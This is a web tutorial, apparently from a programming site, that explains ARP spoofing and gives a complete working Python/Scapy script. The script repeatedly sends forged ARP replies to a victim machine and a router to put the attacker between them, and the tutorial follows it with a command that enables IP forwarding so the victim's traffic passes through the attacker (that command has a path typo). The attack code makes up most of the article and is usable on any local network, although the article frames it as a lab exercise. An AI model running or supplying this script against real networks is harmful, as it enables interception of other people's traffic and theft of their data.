How to make an ARP Spoofing attack using Scapy – Python

Last Updated : 18 Apr, 2023

In this article, we are going to discuss the ARP Spoofing attack using Python programming. Before going deep into the code first let’s understand some basic topics of what is ARP Spoofing and what it does.

ARP Spoofing:

The ARP spoofing is the technique to fool a computer or a device which accepts the ARP response packets even though the device does not request it. As the device accepts the response packet without its knowledge, we can easily mess up with the hack and the hacker takes the advantage of this by sending a modified ARP response packet which contains the modified MAC address of the client with the hacker’s IP address to the router to fool and then simultaneously send the same ARP response packet to the victim saying that I am router. To achieve this attack the hacker sends an ARP response packet to the victim saying that “I am the router with the MAC address (hacker machine address) “and at the same time the hacker sends the same ARP response packet to the router saying that “I am the victim with this MAC address (hacker machine MAC address). Due to ARP request the victim and router will modify their network tables with the respective MAC address provided by the hacker. This can be easily understood by the below figure.

Before the ARP Spoofing attack the connection between the hacker and victim

After the attack the connection between the victim and the hacker

How to make an ARP Spoofing attack using Scapy in Python

Note: Here the attacks are performed under a virtual environment (virtual box) with the Linux operating system as the hacker machine, Windows 10 as the victim machine and our home router as a router. This attack only works when all the devices are in the same network. Here, we are using a NAT network to create this attack.

Step 1: To implement this code in Python we are going to use a package called scapy. First, we are going to create an ARP packet using the scapy package. Here, we are not creating an ARP request, but instead, we are creating an ARP response packet. So, we are going to let us know what fields we need to set in order to make the ARP packet as a response packet in Python as follows. In scapy the ARP packet is created using the syntax as shown below.

Python3

import scapy.all as scapy
 
scapy.ARP()
 
# To list the fields in ARP()
 
print(scapy.ls(scapy.ARP()))

Output:

Step 2: Now let’s understand the code by first getting the MAC address of the device with its IP address with the below code. First, we are using the above-mentioned scapy module to generate an ARP packet to the given IP address.

Python3

# creating an ARP request to the ip address
arp_request = scapy.ARP(pdst=ip)    

Then create a broadcast message with a MAC address to broadcast MAC that is “ff:ff:ff:ff:ff:ff” as shown below.

Python3

# setting the denstination MAC address to broadcast MAC address
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")

Then we combine the broadcast packet with the ARP request.

Python3

# combining the ARP packet with the broadcast message
arp_request_broadcast = broadcast / arp_request

Then sent to the victim’s IP address and to do so we use scapy.srp() as shown below.

Python3

answ = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

Step 3: Now let’s combine the MAC address statements above-mentioned with in a function and then you them with our while loop to continuously fool the devices.

Python3

#!/usr/bin/env python
import time
import sys
import scapy.all as scapy
# MAC address function which will return
# the mac_address of the provided ip address
 
 
def get_mac(ip):
    # creating an ARP request to the ip address
    arp_request = scapy.ARP(pdst=ip)
    # setting the denstination MAC address to broadcast MAC
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    # combining the ARP packet with the broadcast message
    arp_request_broadcast = broadcast / arp_request
     
    # return a list of MAC addresses with respective
    # MAC addresses and IP addresses.
    answ = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    # we choose the first MAC address and select
    # the MAC address using the field hwsrc
    return answ[0][1].hwsrc
 
 
def arp_spoof(target_ip, spoof_ip):
    """" Here the ARP packet is set to response and
    pdst is set to the target IP 
    either it is for victim or router and the hwdst
    is the MAC address of the IP provided
    and the psrc is the spoofing ip address
    to manipulate the packet"""
     
    packet = scapy.ARP(op=2, pdst=target_ip,
                       hwdst=get_mac(target_ip), psrc=spoof_ip)
    scapy.send(packet, verbose=False)
 
 
victim_ip = input()  # taking the victim ip_address
router_ip = input()  # taking the router ip address
sent_packets_count = 0  # initializing the packet counter
while True:
    sent_packets_count += 2
    arp_spoof(victim_ip, router_ip)
    arp_spoof(router_ip, victim_ip)
    print("[+] Packets sent " + str(sent_packets_count), end="\r")
    sys.stdout.flush()
    time.sleep(2)

Output:

After implementing the program the victim does not get the internet connection because the packets are forwarded to the hacker’s machine and in order to allow the flow of packets we need to run a command in a Linux shell as below.

echo 1 > /procs/sys/net/ipv4/ip_forward

The victim ARP table is shown below:

Suggest improvement

Integrated Digital Investigation Process

Create Random RGB Color Code using Python

Share your thoughts in the comments

How to make an ARP Spoofing attack using Scapy – Python

ARP Spoofing:

How to make an ARP Spoofing attack using Scapy in Python

Python3

Python3

Python3

Python3

Python3

Python3

Please Login to comment...

Similar Reads

What kind of Experience do you want to share?